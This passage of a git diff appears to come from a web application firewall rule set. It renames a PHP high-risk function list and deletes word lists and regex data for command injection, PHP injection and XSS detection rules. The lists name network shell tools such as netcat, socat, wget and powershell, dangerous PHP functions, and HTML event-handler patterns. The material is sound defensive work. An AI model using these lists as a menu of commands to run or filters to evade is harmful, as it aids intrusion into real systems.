b/util/php-dictionary-gen/php-high-risk-functions.txt similarity index 92% rename from util/regexp-assemble/regexp-933160.data rename to util/php-dictionary-gen/php-high-risk-functions.txt index ed5190b19c..78b698521f 100644 --- a/util/regexp-assemble/regexp-933160.data +++ b/util/php-dictionary-gen/php-high-risk-functions.txt @@ -11,15 +11,13 @@ array_udiff_uassoc array_uintersect array_uintersect_assoc array_uintersect_uassoc -assert -assert_options +base64_decode base64_encode bson_decode bson_encode +bzdecompress bzopen -chr convert_uuencode -create_function curl_exec curl_file_create curl_init @@ -27,23 +25,14 @@ debug_backtrace error_reporting escapeshellarg escapeshellcmd -eval -exec exif_imagetype exif_read_data exif_tagname exif_thumbnail -file -file_exists -fileatime -filectime -filegroup -fileinode -filemtime -fileperms finfo_open fopen fputs +fsockopen ftp_connect ftp_get ftp_nb_get @@ -52,7 +41,12 @@ ftp_put function_exists fwrite get_cfg_var +get_class_methods +get_class_vars get_current_user +get_defined_constants +get_defined_functions +get_defined_vars get_meta_tags getcwd getenv @@ -62,13 +56,15 @@ getmygid getmyinode getmypid getmyuid -glob gzcompress +gzdecode gzdeflate +gzinflate gzencode gzfile gzopen gzread +gzuncompress gzwrite hash_file hash_hmac_file @@ -89,11 +85,6 @@ imagecreatefromxbm imagecreatefromxpm imagegd imagegd2 -imagegif -imagejpeg -imagepng -imagewbmp -imagexbm ini_get ini_get_all ini_set @@ -132,10 +123,9 @@ odbc_exec odbc_execute odbc_result odbc_result_all -opendir parse_ini_file parse_str -passthru +pfsockopen pg_connect pg_execute pg_prepare @@ -144,12 +134,12 @@ php_strip_whitespace php_uname phpinfo phpversion -popen posix_getegid posix_geteuid posix_getgid posix_getlogin posix_getpwnam +posix_getpwuid posix_kill posix_mkfifo posix_mknod @@ -171,7 +161,6 @@ rawurldecode rawurlencode read_exif_data readdir -readfile readgzfile register_shutdown_function register_tick_function @@ -194,6 +183,7 @@ set_include_path set_magic_quotes_runtime setdefaultstub sha1_file +shell_exec show_source simplexml_load_file simplexml_load_string @@ -214,13 +204,11 @@ stream_socket_client stripcslashes stripslashes strrev -system -tmpfile uasort uksort -unpack unserialize urldecode urlencode usort var_dump +zlib_decode diff --git a/util/regexp-assemble/regexp-932100.txt b/util/regexp-assemble/regexp-932100.txt deleted file mode 100644 index f1cfb57602..0000000000 --- a/util/regexp-assemble/regexp-932100.txt +++ /dev/null @@ -1,168 +0,0 @@ -# Word list for rule 932100 (RCE Unix command injection part 1/3) -# -# To convert to a regexp that can be pasted into the rule: -# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Entries starting with ' are used verbatim. -# Everything after # is a comment. -# -# To prevent some FP for a command, you can require command parameters -# after a command. Only do this if the command regularly causes FP and if -# allowing the bare command (without parameters) is not too dangerous. -# (Note: due to \b following the regexp, a word boundary is also required -# further on, so some letter/number is needed for a match). Example: -# -# diff+ - -# Special regexp case for the '.' (source) command to prevent FP: -'\.\s.* - -7z -7za -7zr -adduser -alias+ -apt-get -arch+ -arp -awk+ -bash -batch+ -breaksw -bsdcat -bsdiff -bsdtar -builtin -bzcat -bzdiff -bzegrep -bzfgrep -bzgrep -bzip2 -bzless -bzmore -cat+ -cc+ -chattr -chdir+ -chflags -chmod -command+ -compress+ -coproc -cp+ -crontab -csh -curl -dash -dhclient -diff+ -dmesg -doas -done -dpkg -du+ -echo+ -egrep -endif -endsw -env -env-update -esac -eval -exec+ -expand -export -expr -fc+ -fetch+ -fgrep -fi -file+ -filetest -find+ -foreach -ftp+ -ftpstats -ftpwho -function -gcc+ -gdb -GET+ -getfacl+ -git+ -grep+ -gunzip -gzcat -gzip -head+ -history -hostid -hostname -htdigest -htpasswd -hup+ -# 'id' causes way too much FP, so we require whitespace; this will allow -# injecting ';id' unfortunately. -id+ -ifconfig -ip6tables -ipconfig -iptables -irb -irb1 -irb18 -irb19 -irb20 -irb21 -irb22 -java+ -jexec -jobs+ -kill+ -killall -last+ -lastcomm -lastlog -lastlogin -ldconfig -ldd+ -less+ -lessecho -lessfile -lesspipe -lftp -lftpget -ln+ -local+ -locate+ -logname -lp+ -ls -ls-F -lsb_release -lscpu -lshw -lsmod -lsof -lspci -lsusb -lwp-download -lwp-dump -lwp-mirror -lwp-request -lynx+ -lzcat -lzcmp -lzdiff -lzegrep -lzfgrep -lzgrep -lzless -lzma -lzmore -mailq -mailx+ -mkdir+ -mlocate -more+ diff --git a/util/regexp-assemble/regexp-932105.txt b/util/regexp-assemble/regexp-932105.txt deleted file mode 100644 index e2bce21457..0000000000 --- a/util/regexp-assemble/regexp-932105.txt +++ /dev/null @@ -1,174 +0,0 @@ -# Word list for rule 932105 (RCE Unix command injection part 2/3) -# -# To convert to a regexp that can be pasted into the rule: -# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Entries starting with ' are used verbatim. -# Everything after # is a comment. -# -# To prevent some FP for a command, you can require command parameters -# after a command. Only do this if the command regularly causes FP and if -# allowing the bare command (without parameters) is not too dangerous. -# (Note: due to \b following the regexp, a word boundary is also required -# further on, so some letter/number is needed for a match). Example: -# -# diff+ - -mount+ -mutt+ -mv+ -mysql -mysqladmin -mysqldump -mysqldumpslow -mysqlhotcopy -mysqlshow -nano+ -nc+ -nc.openbsd -nc.traditional -ncat -net+ -netcat -netkit-ftp -netstat -nice+ -nmap -nohup -nping -nslookup -nstat -onintr -openssl -passwd -patch+ -perl -perl5 -perlsh -perms -pftp -pgrep -php -php5 -php7 -ping -pkexec -pkg -pkg_info -pkginfo -pkill -popd -printenv -printf+ -ps+ -ptar -ptardiff -ptargrep -pushd -python -python2 -python3 -python3m -rar+ -rcp+ -realpath -rename+ -repeat+ -replace+ -rm+ -rmdir+ -rmuser -rnano -route -rpm+ -rsync -ruby -ruby1 -ruby18 -ruby19 -ruby20 -ruby21 -ruby22 -sched -scp+ -sdiff -sed+ -sendmail -set+ -setenv -setfacl+ -setsid -sftp -sh+ -sh.distrib -shutdown -sleep -socat -sort+ -source+ -ssh -strings -su+ -sudo -svn -sysctl -tail -tailf -tar+ -tcping -tcptraceroute -tcsh -tee+ -telnet -time+ -timeout -top -touch+ -traceroute -traceroute6 -ulimit+ -uname -uncompress -unlink+ -unlzma -unrar -unset -unxz -unzip -useradd -userdel -usermod -vigr -vim+ -vipw -w3m -wget -# 'who' causes many FP, so require whitespace. -# Unfortunately, without whitespace it may still leak some info. -who+ -whoami -xargs -xterm -xxd+ -xz+ -xzcat -xzcmp -xzdec -xzdiff -xzegrep -xzfgrep -xzgrep -xzless -xzmore -yum -zcat -zcmp -zdiff -zegrep -zfgrep -zgrep -zip+ -zless -zmore -zrun -zsh diff --git a/util/regexp-assemble/regexp-932106.txt b/util/regexp-assemble/regexp-932106.txt deleted file mode 100644 index 138764face..0000000000 --- a/util/regexp-assemble/regexp-932106.txt +++ /dev/null @@ -1,26 +0,0 @@ -# Word list for rule 932106 (RCE Unix command injection part 3/3) -# -# To convert to a regexp that can be pasted into the rule: -# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# -# Entries starting with ' are used verbatim. -# Everything after # is a comment. -# -# To prevent some FP for a command, you can require command parameters -# after a command. Only do this if the command regularly causes FP and if -# allowing the bare command (without parameters) is not too dangerous. -# (Note: due to \b following the regexp, a word boundary is also required -# further on, so some letter/number is needed for a match). Example: -# -# diff+ - -vi+ -ps -pwd -who -w+ -aptitude+ -pacman+ -dnf+ -up2date+ diff --git a/util/regexp-assemble/regexp-932110.txt b/util/regexp-assemble/regexp-932110.txt deleted file mode 100644 index b964661515..0000000000 --- a/util/regexp-assemble/regexp-932110.txt +++ /dev/null @@ -1,164 +0,0 @@ -# Word list for rule 932110 (RCE Windows command injection part 1/2) -# -# To convert to a regexp that can be pasted into the rule: -# cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl -# -# Entries starting with ' are used verbatim. -# Everything after # is a comment. -# -# To prevent some FP for a command, you can require command parameters -# after a command. Only do this if the command regularly causes FP and if -# allowing the bare command (without parameters) is not too dangerous. -# (Note: due to \b following the regexp, a word boundary is also required -# further on, so some letter/number is needed for a match). Example: -# -# diff@ - -7z -7za -7zr -addusers -admodcmd -arp@ -assoc -attrib -azman -bcdboot -bcdedit -bitsadmin -bootcfg -browstat -cacls -call@ -certreq -certutil -#disabled for FP: change -chdir@ -chkdsk -chkntfs -cipher -cleanmgr -clearmem -cluster -cmd -cmdkey -comexp -comp@ -compact@ -compmgmt -con2prt -convert -copy -csccmd -cscript -csvde -curl -date@ -dcomcnfg -debug -defrag -del@ -delprof -deltree -devcon -devmgmt -diff@ -dir@ -diruse -diskmgmt -diskpart -diskshadow -dnsstat -doskey -driverquery -dsacls -dsadd -dsget -dsmod -dsmove -dsquery -dsrm -dxdiag -echo -egrep -endlocal -erase -eventcreate -eventvwr -expand@ -explorer -fc@ -fgrep -find@ -findstr -foreach -forfiles -format@ -freedisk -fsmgmt -fsutil -ftp@ -ftype -gathernetworkinfo -getmac -git@ -gpedit -gpresult -gpupdate -hdwwiz -hostname -icacls -ifmember -inetcpl -ipconfig -irb -irb1 -irb18 -irb19 -irb20 -irb21 -irb22 -java@ -label@ -logevent -logman -logoff -logtime -lusrmgr -mapisend -mbsacli -md@ -mdsched -measure -mkdir@ -mklink -mmsys -mode@ -more@ -mount@ -mountvol -moveuser -msconfig -msg@ -msiexec -msinfo32 -mstsc -mysql -mysqladmin -mysqldump -mysqldumpslow -mysqlhotcopy -mysqlshow -nbtstat -nc@ -ncat -net@ -netcat -netdom -netsh -netstat -netsvc -nmap -nslookup -ntbackup -ntrights diff --git a/util/regexp-assemble/regexp-932115.txt b/util/regexp-assemble/regexp-932115.txt deleted file mode 100644 index cdbdf7d71a..0000000000 --- a/util/regexp-assemble/regexp-932115.txt +++ /dev/null @@ -1,164 +0,0 @@ -# Word list for rule 932115 (RCE Windows command injection part 2/2) -# -# To convert to a regexp that can be pasted into the rule: -# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl -# -# Entries starting with ' are used verbatim. -# Everything after # is a comment. -# -# To prevent some FP for a command, you can require command parameters -# after a command. Only do this if the command regularly causes FP and if -# allowing the bare command (without parameters) is not too dangerous. -# (Note: due to \b following the regexp, a word boundary is also required -# further on, so some letter/number is needed for a match). Example: -# -# diff@ - -odbcad32 -odbcconf -openfiles -path@ -pathping -perfmon -perl -perl5 -perlsh -php -php5 -php7 -ping -pkgmgr -popd -portqry -powercfg -powershell -powershell_ise -print@ -printbrm -prncnfg -prnmngr -prompt -psexec -psfile -psgetsid -psinfo -pskill -pslist -psloggedon -psloglist -pspasswd -psping -psservice -psshutdown -pssuspend -pushd -python -python2 -python3 -python3m -qgrep -qprocess -query@ -qwinsta -rar@ -rasdial -rasphone -rd@ -recdisc -recover -reg@ -regedit -regini -regsvr32 -rekeywiz -ren@ -rename@ -replace@ -reset@ -rm@ -rmdir@ -rmtshare -robocopy -route@ -rstrui -rsync -ruby1 -ruby18 -ruby19 -ruby20 -ruby21 -ruby22 -runas -rundll32 -schtasks -sclist -secpol -select -set@ -setlocal -setx@ -sfc -share -shellrunas -shift -shortcut -showgrps -showmbrs -shrpubw -shutdown -sigverif -sleep -slmgr -sort -start@ -subinacl -subst -svn -sysdm -syskey -systeminfo -systempropertiesadvanced -systempropertiesdataexecutionprevention -systempropertieshardware -systempropertiesperformance -takeown -taskkill -tasklist -taskmgr -taskschd -telnet -timeout -tlist -tpminit -tracert -tree -tsdiscon -tsshutdn -type@ -typeperf -unrar -unzip -useraccountcontrolsettings -usrstat -verify -vol@ -waitfor -wevtutil -wget -#disabled for FP: where@ -whoami -windiff -winmsdp -winrm -winrs -winvar -wmic -wmimgmt -wscript -wscui -wuapp -wuauclt -wusa -xcacls -xcopy -zip@ diff --git a/util/regexp-assemble/regexp-932130.data b/util/regexp-assemble/regexp-932130.data deleted file mode 100644 index a9561c3eea..0000000000 --- a/util/regexp-assemble/regexp-932130.data +++ /dev/null @@ -1,5 +0,0 @@ -\$\(.*\) -\$\{.*\} -<\(.*\) ->\(.*\) -\$\(\(.*\)\) diff --git a/util/regexp-assemble/regexp-932150.txt b/util/regexp-assemble/regexp-932150.txt deleted file mode 100644 index caaa8c4adf..0000000000 --- a/util/regexp-assemble/regexp-932150.txt +++ /dev/null @@ -1,203 +0,0 @@ -# Word list for rule 932150 (RCE Unix command injection) -# To lower FP, this rule requires whitespace after a command. -# -# To convert to a regexp that can be pasted into the rule: -# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Entries starting with ' are used verbatim. -# Everything after # is a comment. -# - -bash -bsdcat -bsdiff -bsdtar -builtin -bzcat -bzdiff -bzegrep -bzfgrep -bzgrep -bzless -bzmore -cc -command -coproc -csh -curl -dash -diff -dmesg -doas -echo -egrep -env -eval -exec -fetch -fgrep -filetest -ftpstats -ftpwho -gcc -GET -grep -gzcat -gzip -head -hup -irb -irb1 -irb18 -irb19 -irb20 -irb21 -irb22 -java -jobs -x -lastcomm -lastlog -lastlogin -lessecho -lessfile -lesspipe -lftp -lftpget -ls -ls-F -lsb_release -lscpu -lsmod -lsof -lspci -lsusb -lwp -lwp-download -lynx -lzcat -lzcmp -lzdiff -lzegrep -lzfgrep -lzgrep -lzless -lzma -lzmore -mailq -mlocate -mysqladmin -mysqldump -mysqldumpslow -mysqlhotcopy -mysqlshow -nc -nc.openbsd -nc.traditional -ncat -netcat -netkit-ftp -netstat -nohup -nping -nstat -onintr -perl -perl5 -pftp -pgrep -php -php5 -php7 -ping -pkexec -pkill -popd -printenv -ptar -ptardiff -ptargrep -python -python2 -python3 -python3m -rcp -realpath -rename -repeat -replace -rmdir -rmuser -rnano -rsync -ruby -ruby1 -ruby18 -ruby19 -ruby20 -ruby21 -ruby22 -sched -scp -sdiff -sed -sendmail -setenv -setsid -sftp -sh -sh.distrib -socat -source -ssh -strings -sudo -svn -sysctl -tail -tailf -tar -tcping -tcptraceroute -tcsh -telnet -time -timeout -traceroute -traceroute6 -uname -uncompress -unlzma -unrar -unset -unxz -unzip -useradd -userdel -usermod -vigr -vipw -w3m -wget -whoami -xargs -xz -xzcat -xzcmp -xzdec -xzdiff -xzegrep -xzfgrep -xzgrep -xzless -xzmore -zcat -zcmp -zdiff -zegrep -zfgrep -zgrep -zip -zless -zmore -zrun -zsh diff --git a/util/regexp-assemble/regexp-933161.data b/util/regexp-assemble/regexp-933161.data deleted file mode 100644 index 113b9558db..0000000000 --- a/util/regexp-assemble/regexp-933161.data +++ /dev/null @@ -1,202 +0,0 @@ -abs -acos -acosh -array -arsort -asin -asinh -asort -assert -atan -atan2 -atanh -basename -bindec -ceil -chdir -checkdate -chmod -chop -chown -chroot -closedir -closelog -compact -constant -copy -cos -cosh -count -crypt -current -date -decoct -define -defined -die -dir -dirname -diskfreespace -dl -doubleval -each -easter_date -easter_days -echo -empty -end -ereg -eregi -error_log -exit -exp -explode -extract -fclose -feof -fgets -fileowner -filepro -filesize -filetype -floatval -flock -floor -flush -fmod -fread -fstat -ftell -ftok -function -getdate -gettext -gettype -gmdate -hash -header -headers_list -headers_sent -hebrev -hypot -iconv -idate -implode -include -intdiv -intval -invoke -is_a -is_array -is_bool -is_callable -is_double -is_finite -is_float -is_infinite -is_int -is_integer -is_link -is_long -is_nan -is_null -is_numeric -is_object -is_real -is_resource -is_scalar -is_string -isset -join -key -ksort -lcfirst -levenshtein -link -linkinfo -list -localtime -log -log10 -log1p -lstat -ltrim -mail -main -max -mbereg -mbsplit -metaphone -mhash -microtime -min -msql -mysql -natsort -next -octdec -openlog -ord -pack -pathinfo -pclose -pi -pos -pow -prev -print -printf -quotemeta -rand -range -readline -readlink -recode -rename -require -reset -rewind -round -rsort -rtrim -scandir -serialize -settype -shuffle -similar_text -sin -sinh -sizeof -sleep -sort -soundex -split -spliti -sprintf -sqrt -srand -stat -strcoll -strlen -strspn -substr -symlink -syslog -taint -tan -tanh -tempnam -textdomain -time -touch -trim -ucfirst -umask -uniqid -unlink -unset -untaint -usleep -usort -virtual -wordwrap diff --git a/util/regexp-assemble/regexp-934100.txt b/util/regexp-assemble/regexp-934100.txt deleted file mode 100644 index 64065bc61d..0000000000 --- a/util/regexp-assemble/regexp-934100.txt +++ /dev/null @@ -1,8 +0,0 @@ -_\$\$ND_FUNC\$\$_ -__js_function -\beval\s*\( -String\s*\.\s*fromCharCode -function\s*\(\s*\)\s*{ -new\s+Function\s*\( -this\.constructor -module\.exports\s*= diff --git a/util/regexp-assemble/regexp-941130.data b/util/regexp-assemble/regexp-941130.data deleted file mode 100644 index 80ea2def43..0000000000 --- a/util/regexp-assemble/regexp-941130.data +++ /dev/null @@ -1,10 +0,0 @@ -(?i)[\s\S]xlink:href\b -(?i)[\s\S]xhtml\b -(?i)[\s\S]xmlns\b -(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM\b -(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC\b -(?i)[\s\S]data:text/html\b -(?i)[\s\S]formaction\b -(?i)[\s\S]@import\b -(?i)[\s\S];base64\b -(?i)[\s\S]pattern\b.*?=\b diff --git a/util/regexp-assemble/regexp-941160.data b/util/regexp-assemble/regexp-941160.data deleted file mode 100644 index 18f8d41b3d..0000000000 --- a/util/regexp-assemble/regexp-941160.data +++ /dev/null @@ -1,308 +0,0 @@ -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?f\W*?o\W*?r\W*?m -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?t\W*?y\W*?l\W*?e -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?v\W*?g -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?l\W*?i\W*?n\W*?k[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?e\W*?m\W*?b\W*?e\W*?d[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?p\W*?a\W*?r\W*?a\W*?m[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?a\W*?s\W*?e[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?o\W*?d\W*?y[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?e\W*?t\W*?a[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i\W*?m\W*?a?\W*?g\W*?e?[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?v\W*?i\W*?d\W*?e\W*?o[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?u\W*?d\W*?i\W*?o[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?e\W*?t[^>\w] -<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)background[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)formaction[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)lowsrc[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onAppCommand[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMActivate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMAttrModified[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMCharacterDataModified[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusIn[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusOut[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMMouseScroll[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInsertedIntoDocument[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInserted[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemovedFromDocument[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemoved[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMSubtreeModified[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onLoad[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAfterPaint[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAudioAvailable[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozBeforeResize[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICanceled[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICompleted[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUIStarted[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureStart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureUpdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGesture[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMouseHittest[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMousePixelScroll[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozPressTapGesture[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureStart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureUpdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGesture[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozScrolledAreaChanged[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureEnd[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureStart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureUpdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGesture[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozTapGesture[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onRequest[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGAbort[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGError[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGLoad[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGResize[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGScroll[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGUnload[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGZoom[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onabort[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onactivate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onadapteradded[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaddtrack[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterprint[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterscriptexecute[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterupdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onalerting[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationiteration[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationstart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onantennastatechange[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioend[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioprocess[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudiostart[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeactivate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforedeactivate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecopy[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecut[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeeditfocus[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforepaste[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeprint[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforescriptexecute[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeunload[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeupdate[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeginEvent[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbegin[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblocked[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblur[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbounce[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onboundary[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbroadcast[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbusy[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncached[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncallschanged[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplay[\s\x08]*?= -(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplaythrough[\s\x08]*?= 